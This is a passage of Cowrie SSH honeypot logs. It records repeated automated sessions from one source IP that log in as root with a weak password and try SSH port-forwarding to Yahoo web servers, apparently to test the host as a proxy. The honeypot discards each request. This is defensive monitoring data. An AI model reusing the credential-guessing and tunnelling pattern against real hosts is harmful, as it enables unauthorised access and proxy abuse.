.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.922178Z","src_ip":"213.209.150.239","session":"784996e31894"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.157873Z","src_ip":"213.209.150.239","session":"784996e31894"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5091,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5091","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.205887Z","session":"784996e31894"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.253007Z","src_ip":"213.209.150.239","session":"784996e31894"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":11496,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11496","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.389678Z","session":"784996e31894"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.436976Z","src_ip":"213.209.150.239","session":"784996e31894"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.485105Z","src_ip":"213.209.150.239","session":"784996e31894"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42976,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e58c93ccc35","protocol":"ssh","message":"New connection: 213.209.150.239:42976 (1.2.3.4:22) [session: 7e58c93ccc35]","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.540877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.541682Z","src_ip":"213.209.150.239","session":"7e58c93ccc35"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.598686Z","src_ip":"213.209.150.239","session":"7e58c93ccc35"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.881048Z","src_ip":"213.209.150.239","session":"7e58c93ccc35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":27730,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27730","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.938565Z","session":"7e58c93ccc35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:39.995323Z","src_ip":"213.209.150.239","session":"7e58c93ccc35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":15303,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15303","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.151283Z","session":"7e58c93ccc35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.208443Z","src_ip":"213.209.150.239","session":"7e58c93ccc35"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.265958Z","src_ip":"213.209.150.239","session":"7e58c93ccc35"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43034,"dst_ip":"1.2.3.4","dst_port":22,"session":"07622c31474b","protocol":"ssh","message":"New connection: 213.209.150.239:43034 (1.2.3.4:22) [session: 07622c31474b]","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.312114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.312772Z","src_ip":"213.209.150.239","session":"07622c31474b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.360291Z","src_ip":"213.209.150.239","session":"07622c31474b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.595287Z","src_ip":"213.209.150.239","session":"07622c31474b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":10684,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10684","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.643444Z","session":"07622c31474b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.690911Z","src_ip":"213.209.150.239","session":"07622c31474b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":28089,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28089","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.826143Z","session":"07622c31474b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.873478Z","src_ip":"213.209.150.239","session":"07622c31474b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.921457Z","src_ip":"213.209.150.239","session":"07622c31474b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43097,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcb58dfb4957","protocol":"ssh","message":"New connection: 213.209.150.239:43097 (1.2.3.4:22) [session: fcb58dfb4957]","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.967760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:40.968544Z","src_ip":"213.209.150.239","session":"fcb58dfb4957"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.015715Z","src_ip":"213.209.150.239","session":"fcb58dfb4957"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.250834Z","src_ip":"213.209.150.239","session":"fcb58dfb4957"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":31603,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31603","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.299618Z","session":"fcb58dfb4957"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.346875Z","src_ip":"213.209.150.239","session":"fcb58dfb4957"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":975,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:975","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.481982Z","session":"fcb58dfb4957"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.529240Z","src_ip":"213.209.150.239","session":"fcb58dfb4957"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.577140Z","src_ip":"213.209.150.239","session":"fcb58dfb4957"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43148,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f3b6dcad482","protocol":"ssh","message":"New connection: 213.209.150.239:43148 (1.2.3.4:22) [session: 1f3b6dcad482]","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.632790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.633888Z","src_ip":"213.209.150.239","session":"1f3b6dcad482"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.690422Z","src_ip":"213.209.150.239","session":"1f3b6dcad482"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:41.972359Z","src_ip":"213.209.150.239","session":"1f3b6dcad482"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31519,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31519","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.029817Z","session":"1f3b6dcad482"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.086508Z","src_ip":"213.209.150.239","session":"1f3b6dcad482"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":13837,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13837","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.243009Z","session":"1f3b6dcad482"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.299741Z","src_ip":"213.209.150.239","session":"1f3b6dcad482"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.357167Z","src_ip":"213.209.150.239","session":"1f3b6dcad482"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43220,"dst_ip":"1.2.3.4","dst_port":22,"session":"81449c72b74b","protocol":"ssh","message":"New connection: 213.209.150.239:43220 (1.2.3.4:22) [session: 81449c72b74b]","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.403192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.405064Z","src_ip":"213.209.150.239","session":"81449c72b74b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.452443Z","src_ip":"213.209.150.239","session":"81449c72b74b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.687442Z","src_ip":"213.209.150.239","session":"81449c72b74b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31504,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31504","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.735899Z","session":"81449c72b74b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.783081Z","src_ip":"213.209.150.239","session":"81449c72b74b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5219,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5219","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.917480Z","session":"81449c72b74b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:42.964608Z","src_ip":"213.209.150.239","session":"81449c72b74b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:43.013191Z","src_ip":"213.209.150.239","session":"81449c72b74b"}
